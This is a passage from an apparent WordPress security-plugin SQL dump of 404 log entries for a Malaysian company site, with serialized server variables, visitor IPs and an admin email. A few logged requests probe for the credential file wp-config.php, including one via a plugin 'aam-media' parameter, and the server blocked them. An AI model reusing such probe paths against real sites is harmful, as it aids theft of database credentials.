Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOIqHUhbxD0PppYlQ45oAAAAUE\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"40506\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOIqHUhbxD0PppYlQ45oAAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569949864.3043\";s:12:\"REQUEST_TIME\";s:10:\"1569949864\";}}','notice','2019-10-01 17:11:07','2019-10-01 17:11:04',35144200,36942672,'https://bintara.com.my/2',1,0,'104.131.155.126'),(27411,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/3\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOIsHUhbxD0PppYlQ45ogAAAUQ\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"41920\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOIsHUhbxD0PppYlQ45ogAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569949872.489\";s:12:\"REQUEST_TIME\";s:10:\"1569949872\";}}','notice','2019-10-01 17:11:14','2019-10-01 17:11:13',35143312,36949528,'https://bintara.com.my/3',1,0,'104.131.155.126'),(27412,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php~\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:36:\"http://bintara.com.my/wp-config.php~\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZOJcphTzEdyYDEAlqWXtwAAAII\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOJcphTzEdyYDEAlqWXtwAAAII\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"49018\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php~\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOJcphTzEdyYDEAlqWXtwAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569950066.6774\";s:12:\"REQUEST_TIME\";s:10:\"1569950066\";}}','notice','2019-10-01 17:14:31','2019-10-01 17:14:27',35578976,37388064,'https://bintara.com.my/wp-config.php~',1,0,'104.131.155.126'),(27413,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-config.php?aam-media=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:47:\"http://bintara.com.my/wp-config.php?aam-media=1\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZOJe5hTzEdyYDEAlqWXvAAAAIM\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZOJe5hTzEdyYDEAlqWXvAAAAIM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"104.131.155.126\";s:11:\"REMOTE_PORT\";s:5:\"50569\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOJe5hTzEdyYDEAlqWXvAAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569950076.1842\";s:12:\"REQUEST_TIME\";s:10:\"1569950076\";}}','notice','2019-10-01 17:14:39','2019-10-01 17:14:36',35191904,36996256,'https://bintara.com.my/wp-config.php?aam-media=1',1,0,'104.131.155.126'),(27414,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3428.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"23.108.47.222\";s:11:\"REMOTE_PORT\";s:5:\"54146\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZOLtpHiT4fRdgjqkdPkyAAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569950646.9871\";s:12:\"REQUEST_TIME\";s:10:\"1569950646\";}}','notice','2019-10-01 17:24:10','2019-10-01 17:24:07',35530608,37340400,'https://bintara.com.my/?page_id=18',1,0,'23.108.47.222'),(27415,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:34:\"/blog/tag/video-conferencing/feed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:56:\"https://bintara.com.my/blog/tag/video-conferencing/feed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:34:\"/blog/tag/video-conferencing/feed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZPanJHiT4fRdgjqkdPrgQAAAM0\";s:12:\"REDIRECT_URL\";s:34:\"/blog/tag/video-conferencing/feed/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.60\";s:11:\"REMOTE_PORT\";s:4:\"3430\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:56:\"https://bintara.com.my/blog/tag/video-conferencing/feed/\";s:10:\"SCRIPT_URL\";s:34:\"/blog/tag/video-conferencing/feed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZPanJHiT4fRdgjqkdPrgQAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569970845.1499\";s:12:\"REQUEST_TIME\";s:10:\"1569970845\";}}','notice','2019-10-01 23:00:50','2019-10-01 23:00:46',34471576,36271744,'https://bintara.com.my/blog/tag/video-conferencing/feed/',1,0,'157.55.39.60'),(27416,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"77.83.202.34\";s:11:\"REMOTE_PORT\";s:5:\"60964\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZPx@ZHiT4fRdgjqkdPujAAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569976825.5571\";s:12:\"REQUEST_TIME\";s:10:\"1569976825\";}}','notice','2019-10-02 00:40:28','2019-10-02 00:40:26',35138888,36946680,'https://bintara.com.my/?page_id=18/contact.php',1,0,'77.83.202.34'),(27417,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"CD65E062-C003-4233-B1AC-08D5BC1717B2\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZP2apHiT4fRdgjqkdPvJQAAAMI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.235\";s:11:\"REMOTE_PORT\";s:5:\"50543\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZP2apHiT4fRdgjqkdPvJQAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569977962.8593\";s:12:\"REQUEST_TIME\";s:10:\"1569977962\";}}','notice','2019-10-02 00:59:25','2019-10-02 00:59:23',35500792,37296208,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.235'),(27418,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3238.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"50.3.197.140\";s:11:\"REMOTE_PORT\";s:5:\"59276\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZQQq0YJc9h4Z@Pr-gDSzAAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569984683.5633\";s:12:\"REQUEST_TIME\";s:10:\"1569984683\";}}','notice','2019-10-02 02:51:26','2019-10-02 02:51:23',35534696,37340496,'https://bintara.com.my/?page_id=18',1,0,'50.3.197.140'),(27419,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; 